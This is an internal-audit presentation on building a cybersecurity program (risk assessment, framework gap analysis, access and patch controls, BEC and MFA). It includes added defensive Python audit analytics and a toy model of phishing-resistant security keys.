Key to an effective cybersecurity program is understanding the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT (continued)
• Through formal risk assessments with all critical functions in the business, identify where data lives and how it should be classified, then perform a threat analysis to semi-quantitatively determine the risk of a particular cybersecurity incident occurring. This lets you determine which critical data assets in your environment are at most risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business.
[Example screenshot of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls.
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment).
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap.
[Chart: Mitigating Control Counts, one bar per candidate control]
How the counts were derived:
A) Identify information systems with a calculated cybersecurity risk over 100.
B) Does the information system have a SPECIFIC THREAT with a cybersecurity risk over 100 (Yes / No)? If yes, move to the next step.
C) Identify the mitigating controls to implement to mitigate that threat.
D) Total all instances where each control reduced risk.
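Steps A to D above, worked as an added example in Python. This is illustrative code written for this page, not the presenter's risk assessment tool: the scoring model (risk = asset value on a 1-10 scale × likelihood 1-5 × impact 1-5), the rating scales, and the four assets and four threats are assumptions made for the example. The only things taken from the slide are the "over 100" threshold and the idea of counting, per control, how many high-risk asset/threat pairs it mitigates.

```python
"""Added example (illustrative, not the presenter's tool): a
semi-quantitative risk assessment in the shape of Step 1 and the A-D
control count of Step 3. Scoring model, an assumption for this example:

    risk = asset_value (1-10) x threat_likelihood (1-5) x threat_impact (1-5)

so scores run 1..250 and the slide's "over 100" threshold is meaningful.
All assets, threats, ratings and control names are constructed sample data.
"""
from collections import Counter
from dataclasses import dataclass

THRESHOLD = 100  # "calc cybersecurity risk > 100" from the Step 3 slide


@dataclass(frozen=True)
class Asset:
    name: str
    owner: str           # business owner interviewed (not only IT)
    location: str        # where the data lives
    classification: str  # data classification agreed with IT
    value: int           # 1-10 business value rating


@dataclass(frozen=True)
class Threat:
    name: str
    likelihood: int      # 1-5
    impact: int          # 1-5
    controls: tuple      # mitigating controls that reduce this threat


ASSETS = [  # constructed inventory
    Asset("Payroll database", "HR", "on-prem SQL server", "Restricted", 9),
    Asset("Treasury banking portal credentials", "Treasury", "finance workstations", "Restricted", 8),
    Asset("Customer CRM", "Sales", "SaaS", "Confidential", 6),
    Asset("Marketing website", "Marketing", "cloud VM", "Public", 2),
]

THREATS = [  # constructed threat catalogue with the controls that reduce each
    Threat("Ransomware", 4, 5,
           ("Patch management", "Offline backups", "Endpoint protection",
            "Phishing awareness training")),
    Threat("Business email compromise", 4, 4,
           ("Multi-factor authentication", "Vendor bank-change callback verification",
            "Phishing awareness training")),
    Threat("Privileged credential abuse", 3, 5,
           ("Least-privilege access review", "Multi-factor authentication",
            "Privileged-change alerting")),
    Threat("Web defacement", 4, 2,
           ("Patch management", "Web application firewall")),
]


def risk_score(asset: Asset, threat: Threat) -> int:
    """Step 1: calculated risk of one threat to one asset."""
    return asset.value * threat.likelihood * threat.impact


def high_risk_pairs(assets, threats, threshold=THRESHOLD):
    """Steps A and B: (asset, threat, score) rows where that specific
    threat's risk to the asset is over the threshold, highest first."""
    rows = [(a.name, t.name, risk_score(a, t)) for a in assets for t in threats]
    return sorted((r for r in rows if r[2] > threshold), key=lambda r: -r[2])


def mitigating_control_counts(assets, threats, threshold=THRESHOLD):
    """Steps C and D: credit every control that mitigates the threat in a
    high-risk row; the total per control is the bar height on the chart."""
    by_name = {t.name: t for t in threats}
    counts = Counter()
    for _asset, threat_name, _score in high_risk_pairs(assets, threats, threshold):
        counts.update(by_name[threat_name].controls)
    return counts


if __name__ == "__main__":
    for asset, threat, score in high_risk_pairs(ASSETS, THREATS):
        print(f"{score:4d}  {asset:38s} {threat}")
    print("\nMitigating control counts (implement the top ones first):")
    for control, n in mitigating_control_counts(ASSETS, THREATS).most_common():
        print(f"{n:3d}  {control}")
```

Run as a script it lists the seven asset/threat pairs over the threshold and then the control counts. Phishing awareness training scores highest (5) because it mitigates both of the threats that put the most assets over the line, which is the "most impactful controls first" ordering Step 2 asks for; the web application firewall scores zero because the only threat it addresses never crosses the threshold for any asset.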
STEP 4 - CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position.
• Consider using the COBIT Process Capability Model to map out the CIS Critical Security Controls (CSC) framework, which allows management to begin tracking cybersecurity maturity.
Capability levels: 1 = Performed, 2 = Managed, 3 = Established, 4 = Predictable, 5 = Optimized (COBIT also defines level 0 = Incomplete for a process that is not performed at all).
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 Rev. 5, Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• CIS Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX: the in-scope financial systems are only part of the picture.
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email; administrators should have a separate standard account for that work.
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing).
• Consider how IT monitors and is alerted on changes to elevated privileges (for example, additions to administrator groups).
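The three access bullets above turned into tests an auditor could run over an account export and a security log, as an added example (not code from the original slides). The group names, the privileged-account policy numbers, the simplified one-line event format and the accounts themselves are assumptions; a real Windows event carries the same fields (subject, member, group) in a different layout, and a real export would come from Active Directory or the identity provider.

```python
"""Added example, not part of the original slides: two audit tests for the
privileged-access bullets above, run against constructed sample data.
  review_privileged_accounts()  - checks each admin account against a
      higher standard than ordinary users (password policy, age, MFA,
      daily-use mailbox, shared use);
  privileged_group_changes()    - the detection rule behind "alerted on
      changes to elevated privileges": additions to privileged groups
      picked out of Windows Security event records.
Group names, the policy numbers, the event line format and every account
are assumptions for the example, not a real directory or real policy.
"""
import re
from dataclasses import dataclass
from datetime import date

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}

# Assumed standard for privileged accounts (stricter than the user policy).
ADMIN_POLICY = {"min_password_length": 16, "max_password_age_days": 90}


@dataclass(frozen=True)
class Account:
    sam: str
    groups: frozenset
    pwd_min_length: int    # minimum length of the password policy applied to this account
    pwd_last_set: date
    pwd_never_expires: bool
    mfa_enrolled: bool
    has_mailbox: bool      # a mailbox means the account is used for daily work
    shared: bool           # known to be used by more than one person


def is_privileged(acct: Account) -> bool:
    return bool(acct.groups & PRIVILEGED_GROUPS)


def review_privileged_accounts(accounts, as_of: date, policy=ADMIN_POLICY):
    """Return {account: [issues]} for privileged accounts that miss the standard."""
    findings = {}
    for a in accounts:
        if not is_privileged(a):
            continue
        issues = []
        if a.pwd_min_length < policy["min_password_length"]:
            issues.append(f"password policy minimum {a.pwd_min_length} < {policy['min_password_length']}")
        age = (as_of - a.pwd_last_set).days
        if a.pwd_never_expires:
            issues.append("password never expires")
        elif age > policy["max_password_age_days"]:
            issues.append(f"password {age} days old")
        if not a.mfa_enrolled:
            issues.append("no MFA enrolled")
        if a.has_mailbox:
            issues.append("has a mailbox: privileged account used for daily tasks")
        if a.shared:
            issues.append("shared account: no individual accountability")
        if issues:
            findings[a.sam] = issues
    return findings


# Constructed event records in a simplified one-line form. Windows logs
# 4728 / 4732 / 4756 when a member is added to a security-enabled global /
# local / universal group, and 4729 / 4733 / 4757 for the removal.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<id>\d+)\s+Subject=(?P<subject>\S+)\s+"
    r"Member=(?P<member>\S+)\s+Group=(?P<group>.+)$")
ADD_EVENTS = {"4728", "4732", "4756"}


def privileged_group_changes(lines, privileged=PRIVILEGED_GROUPS):
    """Return (timestamp, who did it, who was added, group) for every
    addition to a privileged group; the alert should name all four."""
    alerts = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m and m["id"] in ADD_EVENTS and m["group"] in privileged:
            alerts.append((m["ts"], m["subject"], m["member"], m["group"]))
    return alerts


AS_OF = date(2019, 3, 31)
ACCOUNTS = [  # constructed sample export
    Account("jsmith", frozenset({"Domain Users"}), 8, date(2019, 1, 15), False, False, True, False),
    Account("jsmith-adm", frozenset({"Domain Users", "Domain Admins"}), 16, date(2019, 3, 1), False, True, False, False),
    Account("rlee", frozenset({"Domain Users", "Domain Admins"}), 8, date(2018, 8, 1), False, False, True, False),
    Account("backup_svc", frozenset({"Administrators"}), 8, date(2016, 5, 20), True, False, False, True),
]
SAMPLE_EVENTS = [  # constructed, not real log output
    "2019-03-04T02:13:55Z EventID=4728 Subject=CORP\\rlee Member=CORP\\ctr-temp Group=Domain Admins",
    "2019-03-04T09:00:01Z EventID=4732 Subject=CORP\\jsmith-adm Member=CORP\\jsmith Group=Remote Desktop Users",
    "2019-03-05T17:45:10Z EventID=4729 Subject=CORP\\rlee Member=CORP\\ctr-temp Group=Domain Admins",
    "2019-03-06T03:30:00Z EventID=4732 Subject=CORP\\backup_svc Member=CORP\\svc-new Group=Administrators",
]

if __name__ == "__main__":
    for sam, issues in review_privileged_accounts(ACCOUNTS, AS_OF).items():
        print(sam, "->", "; ".join(issues))
    for alert in privileged_group_changes(SAMPLE_EVENTS):
        print("ALERT privileged group change:", alert)
```

Two things the sample is built to show: the admin account that also has a mailbox (rlee) is the "privileged account used for daily tasks" case, and the 2 a.m. addition of a contractor account to Domain Admins followed by its removal the next day is exactly the short-lived elevation that only an alert on the addition event, not a quarterly access review, will ever catch.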
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness campaigns (simulated phishing emails sent to staff).
• Evaluate your company's overall cybersecurity training and awareness program.
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process.
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly.
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management (with a named approver and an expiry date), and assess whether sufficient mitigating controls are in place.
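The vulnerability-management bullets above as one audit analytic, added here as an example (not code from the original slides). It reconciles an asset inventory with scanner output, ages each finding from the day the vendor published the fix, applies an assumed SLA table, and lets a current, formally accepted risk excuse a finding while an expired one does not. Every host, finding name, date and the SLA numbers are constructed; none of the findings refers to a real vulnerability.

```python
"""Added example, not part of the original slides: the vulnerability-
management tests above as one audit analytic over constructed data.
It reconciles the asset inventory with scanner output (devices the
scanner never saw, and scanned devices nobody inventoried), ages every
finding from the date the vendor published the fix, and separates
overdue items from those covered by a current, formally accepted risk.
Hostnames, finding names, dates and the SLA table are invented for the
example; none of the findings refers to a real vulnerability.
"""
from dataclasses import dataclass
from datetime import date

# Assumed remediation SLA, in days after the vendor published the patch.
SLA_DAYS = {"critical": 14, "high": 30, "medium": 90, "low": 180}
INTERNET_FACING_SLA = 14  # internet-facing hosts never get longer than this


@dataclass(frozen=True)
class Device:
    host: str
    kind: str             # workstation, server, network, ...
    internet_facing: bool


@dataclass(frozen=True)
class Finding:
    host: str
    name: str
    severity: str
    patch_published: date


@dataclass(frozen=True)
class RiskAcceptance:
    host: str
    name: str
    expires: date
    approver: str
    mitigation: str


def sla_for(finding: Finding, device) -> int:
    """Days allowed to patch; unknown devices get the plain severity SLA."""
    days = SLA_DAYS[finding.severity]
    if device is not None and device.internet_facing:
        days = min(days, INTERNET_FACING_SLA)
    return days


def reconcile(inventory, findings, acceptances, as_of: date) -> dict:
    devices = {d.host: d for d in inventory}
    scanned = {f.host for f in findings}
    accepted = {(a.host, a.name): a for a in acceptances}
    report = {
        "never_scanned": sorted(set(devices) - scanned),    # inventory gap in scanning
        "unknown_devices": sorted(scanned - set(devices)),  # scanner found a device nobody tracks
        "overdue": [], "risk_accepted": [], "within_sla": [],
    }
    for f in findings:
        age = (as_of - f.patch_published).days
        sla = sla_for(f, devices.get(f.host))
        if age <= sla:
            report["within_sla"].append((f.host, f.name, age))
            continue
        ra = accepted.get((f.host, f.name))
        if ra is not None and ra.expires >= as_of:
            report["risk_accepted"].append((f.host, f.name, age, ra.approver, ra.expires))
        else:
            reason = f"acceptance expired {ra.expires}" if ra else "no documented acceptance"
            report["overdue"].append((f.host, f.name, f.severity, age, sla, reason))
    return report


AS_OF = date(2019, 3, 31)
INVENTORY = [  # constructed CMDB extract
    Device("fw-edge-01", "network", True),
    Device("web-01", "server", True),
    Device("db-01", "server", False),
    Device("ws-0142", "workstation", False),
    Device("ctx-01", "server", True),
]
SCAN_RESULTS = [  # constructed scanner export; finding names are placeholders
    Finding("web-01", "Outdated web server version", "critical", date(2018, 1, 10)),
    Finding("db-01", "Database missing vendor cumulative update", "high", date(2019, 3, 5)),
    Finding("ws-0142", "Outdated Java runtime", "high", date(2018, 11, 20)),
    Finding("ws-0142", "Outdated PDF reader", "medium", date(2019, 2, 1)),
    Finding("printer-3f", "Printer firmware out of date", "high", date(2017, 6, 1)),
    Finding("ctx-01", "Remote access gateway patch missing", "critical", date(2019, 3, 20)),
]
RISK_ACCEPTANCES = [  # constructed risk register entries
    RiskAcceptance("ws-0142", "Outdated Java runtime", date(2019, 6, 30), "CIO",
                   "legacy app needs the old runtime; application whitelisting in place"),
    RiskAcceptance("web-01", "Outdated web server version", date(2018, 12, 31), "IT Manager",
                   "migration planned"),
]

if __name__ == "__main__":
    for section, rows in reconcile(INVENTORY, SCAN_RESULTS, RISK_ACCEPTANCES, AS_OF).items():
        print(section.upper())
        for row in rows:
            print("  ", row)
```

The two reconciliation lists are the part most audits skip: a firewall that is in the inventory but never scanned, and a printer the scanner found that nobody inventoried, are both "we do not know all of our devices" findings before any patch is even assessed. The web server with a 445-day-old critical patch and an expired acceptance is the one-year-plus case the statistic above describes.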
CYBERSECURITY – SUMMARY QUICK HIT LIST
Review at least the following for your company:
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (password length, characters and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and that backups are properly segregated from the production network, so that ransomware cannot encrypt them along with everything else.
• Understand the coverage and terms of your company's cyber insurance policy.
• Assess the requirement for multi-factor authentication.
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal
mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates, stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites on the internet that are not reachable by normal search engines or means. Darknet sites require special software such as Tor (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoin is the usual currency traded on the dark web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger (the blockchain) that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward of newly created bitcoins. The difficulty of the puzzle is adjusted upward as more computing power joins the network, so mining keeps getting more expensive.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method.
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have since dropped, but are still present (HR and healthcare companies were both hit in February).
• The WannaCry ransomware attack impacted over 200,000 systems across 150 countries. It included a worm component, so once inside a network it spread to other vulnerable machines on its own, without anyone opening an attachment.
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and little effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS operator handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and will reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees.
• The FBI's Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion).
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident:
• All nine lost at least $1 million to the BEC scam.
• Two companies lost more than $30 million each.
• In total the nine issuers lost almost $100 million.
BEC & PHISHING
Phishing: A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear Phishing: Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (reusing a previous legitimate email) and whaling (attacking a high-level executive). Examples:
• CEO email to the Treasurer
• HR phishing for employee data
• W-2 phishing for employee tax data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of external-sender warning inserted into the subject line or the body of the message.
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage.
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies.
• 20% of all companies use Office 365.
• Office 365 overtook the traditional (on-premises) Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft.
• Most companies do not correctly set up Office 365 security or logging (for example, mailbox audit logging and alerting on newly created inbox forwarding rules, which attackers use to quietly copy a victim's mail, are commonly left off).
• There has been a significant increase in attack vectors against Office 365.
• It only takes one employee and the hacker is internal to email and Office 365.
• Some attack vectors do not require a phishing email.
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash.
Cash Receipts
• Review of balances over 60 days and over $10k – in one case this triggered a review, and the follow-up communication uncovered a change in bank info (the communication had been going to a deleted email address).
• Reports that generate overdue receivables timely for follow-up.
• Escalation rules for overdue receivables.
Cash Disbursements
• SOD – limit access to the vendor master file.
• Controls around changing bank info for all vendors – this needs more than email communication: personal verification with the vendor requesting the change, using the contact details already on file rather than those supplied in the request.
• Vendor set-up – verification of the information provided.
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as a vendor.
• ACH debits – no reason to give debit access to the account; if it is done, dual approval and a ZBA (zero-balance account) should be used.
• Multi-factor authentication.
Other Processes to Consider: Treasury, Payroll, Royalties, Cyber Insurance, Legal Liabilities, Contract Language, SOX Impact.
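The vendor bank-detail controls above expressed as a check an auditor could run over accounts-payable records, added as an example (not code from the original slides). It treats a bank-account change as verified only when the call-back went to the phone number already on file, not a number supplied in the request, and a second person different from the one who keyed the change approved it; payments to an account whose change failed either test are listed. Vendors, staff, phone numbers, accounts and amounts are all constructed.

```python
"""Added example, not part of the original slides: the vendor bank-detail
controls above as a check over accounts-payable records. A bank-account
change passes only if (1) the vendor was called back on the phone number
already on file, not on a number supplied in the request, and (2) a second
person, different from the one who keyed the change, approved it. Payments
to an account whose change failed either test are listed as at risk.
Vendors, staff, phone numbers, accounts and amounts are all constructed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Vendor:
    vendor_id: str
    name: str
    phone_on_file: str   # captured and verified at vendor set-up
    bank_account: str    # masked


@dataclass(frozen=True)
class BankChange:
    change_id: str
    vendor_id: str
    new_account: str
    requested_via: str               # "email", "vendor portal", "letter", ...
    phone_in_request: Optional[str]  # contact number the request itself offered
    entered_by: str
    approved_by: Optional[str]
    callback_number: Optional[str]   # number actually dialed to confirm
    callback_by: Optional[str]


@dataclass(frozen=True)
class Payment:
    payment_id: str
    vendor_id: str
    account: str
    amount: float


def check_bank_change(change: BankChange, vendor: Vendor) -> list:
    """Return the control failures for one bank-detail change (empty = passed)."""
    failures = []
    if change.callback_number is None:
        failures.append("no call-back verification with the vendor")
    elif change.callback_number != vendor.phone_on_file:
        where = ("the number offered in the request" if change.callback_number == change.phone_in_request
                 else "an unverified number")
        failures.append(f"call-back went to {where}, not the number on file")
    if change.approved_by is None or change.approved_by == change.entered_by:
        failures.append("no independent second approval")
    return failures


def payments_at_risk(payments, changes, vendors):
    """(payment, failures) for payments sent to an account whose change failed a control."""
    bad_accounts = {}
    for c in changes:
        failures = check_bank_change(c, vendors[c.vendor_id])
        if failures:
            bad_accounts[(c.vendor_id, c.new_account)] = failures
    return [(p, bad_accounts[(p.vendor_id, p.account)])
            for p in payments if (p.vendor_id, p.account) in bad_accounts]


VENDORS = {  # constructed vendor master
    "V100": Vendor("V100", "Acme Pipe Supply", "+1-918-555-0100", "****1234"),
    "V200": Vendor("V200", "Northwind Freight", "+1-214-555-0199", "****5678"),
}
CHANGES = [  # constructed change log
    # Classic BEC: the "vendor" emailed new details and a new contact number,
    # the clerk called that number, and then approved their own entry.
    BankChange("C1", "V100", "****9876", "email", "+1-918-555-0177",
               "apclerk1", "apclerk1", "+1-918-555-0177", "apclerk1"),
    # Proper handling: call-back to the number on file, separate approver.
    BankChange("C2", "V200", "****4321", "vendor portal", None,
               "apclerk2", "apmanager", "+1-214-555-0199", "apclerk2"),
]
PAYMENTS = [  # constructed payment run
    Payment("P1", "V100", "****9876", 184000.00),
    Payment("P2", "V200", "****4321", 42000.00),
    Payment("P3", "V100", "****1234", 5000.00),
]

if __name__ == "__main__":
    for payment, failures in payments_at_risk(PAYMENTS, CHANGES, VENDORS):
        print(f"HOLD {payment.payment_id} ${payment.amount:,.2f} to {payment.vendor_id}: "
              + "; ".join(failures))
```

The C1 record is the pattern behind most BEC losses: the clerk did make a call, but to the number in the fraudulent email, which only proves the attacker answers their own phone. Run the check before the payment run, not after, so the $184,000 payment is held rather than reported.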
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes. A one-time code can be typed into a fake login page and relayed to the real one; a security key's response is bound to the site the browser is actually talking to, so a look-alike site gets nothing it can reuse.
• Office 365 and other cloud-based services should all use multi-factor authentication.
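Why security keys close the door that one-time codes leave open, as an added example (not code from the original slides, and a deliberate simplification of the FIDO/WebAuthn protocol rather than an implementation of it): the key's signature is stood in for by an HMAC, the site names and secrets are made up, and the point being modelled is that the browser, never the web page, supplies the origin that gets signed and that selects which credential the key will use. A one-time code carries nothing about where it was typed, so a fake page can relay it.

```python
"""Added example, not part of the original slides: why the security keys
in the Google figure above stop phishing while one-time codes do not.
This is a deliberately simplified model of the FIDO/WebAuthn idea, not
the real protocol: the key's signature is stood in for by an HMAC, and
the browser (never the web page) supplies the origin that gets signed
and scopes which credential may be used. Site names and secrets are
made up for the example.
"""
import hashlib
import hmac
import json
import secrets

REAL_SITE = "https://accounts.example.test"      # the relying party (assumption)
PHISHING_SITE = "https://accounts-example.test"  # look-alike run by the attacker

# --- One-time codes (HOTP-style, RFC 4226 truncation) ----------------------
OTP_SECRET = b"constructed-shared-secret"  # shared between the user's app and the site


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    digest = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def site_checks_otp(code: str, counter: int) -> bool:
    return hmac.compare_digest(code, hotp(OTP_SECRET, counter))


def phish_with_otp() -> bool:
    """The fake page asks for 'your 6-digit code'; the victim types it; the
    attacker forwards it to the real site. Nothing ties the code to a site."""
    counter = 41
    code_typed_by_victim = hotp(OTP_SECRET, counter)       # read off the victim's app
    return site_checks_otp(code_typed_by_victim, counter)  # attacker submits it


# --- Security key (simplified WebAuthn) -----------------------------------
# Credentials live on the key, scoped to the site they were registered at.
KEY_CREDENTIALS = {REAL_SITE: b"constructed-per-site-credential-key"}


def authenticator_assert(origin: str, challenge: str):
    """The browser passes the page's challenge plus the origin it is actually
    showing. The key only answers for a site it holds a credential for and
    signs both values together."""
    cred = KEY_CREDENTIALS.get(origin)
    if cred is None:
        return None
    client_data = json.dumps({"challenge": challenge, "origin": origin}, sort_keys=True).encode()
    return client_data, hmac.new(cred, client_data, hashlib.sha256).digest()


def site_verifies_assertion(assertion, expected_challenge: str) -> bool:
    if assertion is None:
        return False
    client_data, signature = assertion
    data = json.loads(client_data)
    if data["origin"] != REAL_SITE or data["challenge"] != expected_challenge:
        return False
    expected = hmac.new(KEY_CREDENTIALS[REAL_SITE], client_data, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


def legitimate_security_key_login() -> bool:
    challenge = secrets.token_hex(16)  # fresh per login
    return site_verifies_assertion(authenticator_assert(REAL_SITE, challenge), challenge)


def phish_with_security_key() -> bool:
    """The attacker relays the real site's challenge to the victim's browser,
    which is on the phishing origin, and forwards whatever comes back."""
    challenge = secrets.token_hex(16)  # obtained from the real site
    relayed = authenticator_assert(PHISHING_SITE, challenge)
    return site_verifies_assertion(relayed, challenge)


def attacker_forges_origin() -> bool:
    """Even if the attacker writes origin=REAL_SITE into the client data
    themselves, they cannot produce the key's signature over it."""
    challenge = secrets.token_hex(16)
    client_data = json.dumps({"challenge": challenge, "origin": REAL_SITE}, sort_keys=True).encode()
    forged = hmac.new(b"attacker-guess", client_data, hashlib.sha256).digest()
    return site_verifies_assertion((client_data, forged), challenge)


if __name__ == "__main__":
    print("OTP phish succeeds:          ", phish_with_otp())
    print("security key login succeeds: ", legitimate_security_key_login())
    print("security key phish succeeds: ", phish_with_security_key())
    print("forged origin succeeds:      ", attacker_forges_origin())
```

The relay attack fails twice over: the key refuses to answer for an origin it has no credential for, and even a fabricated assertion naming the real origin fails the signature check. That is the property "phishing-resistant" refers to, and it is what a one-time code, however it is delivered, cannot provide.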
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around the company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
